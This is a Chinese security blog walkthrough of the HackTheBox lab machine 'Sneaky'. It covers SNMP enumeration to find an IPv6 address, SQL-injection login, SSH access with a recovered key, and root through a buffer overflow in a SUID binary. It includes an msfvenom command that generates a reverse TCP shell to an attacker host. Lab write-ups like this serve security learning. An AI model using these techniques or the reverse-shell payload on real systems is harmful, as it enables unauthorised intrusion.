本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
一个每日分享渗透小技巧的公众号
大家好,这里是 大余安全 的第 102 篇文章,本公众号会每日分享攻防渗透技术给大家。
靶机地址:https://www.hackthebox.eu/home/machines/profile/19
靶机难度:中级(5.0/10)
靶机发布日期:2017 年 10 月 29 日
靶机描述:
Sneaky, while not requiring many steps to complete, can be difficult for some users. It explores enumeration through SNMP and has a beginner level buffer overflow vulnerability which can be leveraged for privilege escalation.
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的 IP 是 10.10.10.20....
Nmap 扫描仅发现开放了 Apache 和 SNMP 两个服务...
80 端口上没什么可用的信息... 直接枚举爆破看看...
枚举发现了 dev 目录...
dev 目录提供了此页面... 通过利用 burpsuit 拦截尝试 sql 注入枚举爆破...
可看到通过尝试通用的 sql 注入代码... 成功登录...
登录后获得了两个用户名信息:
admin和thrasivoulos
以及 rsa 的 key,这里很熟悉吧... 就在前面两三章就做了两次一模一样的环境...
思路就是利用 rsa 的 key 通过 ssh 服务访问到用户... 从而在用户提权 root... 但是 nmap 只发现开放了 http 和 snmp 服务... 未开放 ssh 服务??
这里熟悉的小伙伴就知道,snmp 关联着 ipv6 信息... 可以参考:
https://www.jianshu.com/p/dc2dc0222940
将 key 保存到本地...
利用 snmpwalk 命令来和 snmp 主机进行交换数据...
可以看到存在可用的 IPv6 接口信息... 需要获得靶机的 ipv6 信息...
可以看到 Enyx 专门用来获取 ipv6 的信息工具... 利用即可...
通过利用 enyx 获取了所有接口的 ipv6 信息...
检查发现...nmap 扫描 IPv6 信息对方是开启了 ssh 的... 那这就直接登录即可...
直接利用前面获取的信息量... 成功登录了,并获得了 user 信息...(这里就不多说了,连续靶机都是类似环境)
直接通过 LinEnum.sh 枚举所有信息量...
在查看到 SUID 位时,resrwsr 的 chal 程序存在异常... 应该是缓冲区溢出提权了...(这里环境和前面一台靶机差不多... 雷同,那台也是 ssh 登录后缓冲区溢出提权.. 那台是可以直接利用 / bin/sh 写入程序直接获得 root...)
下载到本地分析...
这里直接快速了... 做了太多缓冲区溢出了... 获得了偏移量 362...
msfvenom -a x86 --platform -linux -p linux/x86/shell_reverse_tcp LHOST=10.10.14.51 LPORT=6666 -e x86/alpha_mixed -f python
这里我利用了 msf 生成的 shell... 也可以利用原生的 shell 简单... 很多 shell 自行 google
知道偏移量,在获取 EIP 即可提权... 这里我编写的简单 shell 脚本 nop 是 x90,直接对程序 x/100x $esp-200 发现了很多可以利用的 EIP,这里的都可以利用... 直接写入...
这里我利用了 788 的 EIP,别的也试过也成功... 或者不需要 NOP 的情况直接 google /bin/sh 源直接利用原生 EIP 提权也行...
成功注入 shell 提权 root,获得了 root.txt 信息...
由于我们已经成功得到 root 权限查看 user 和 root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~
随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~
欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!
大余安全
一个全栈渗透小技巧的公众号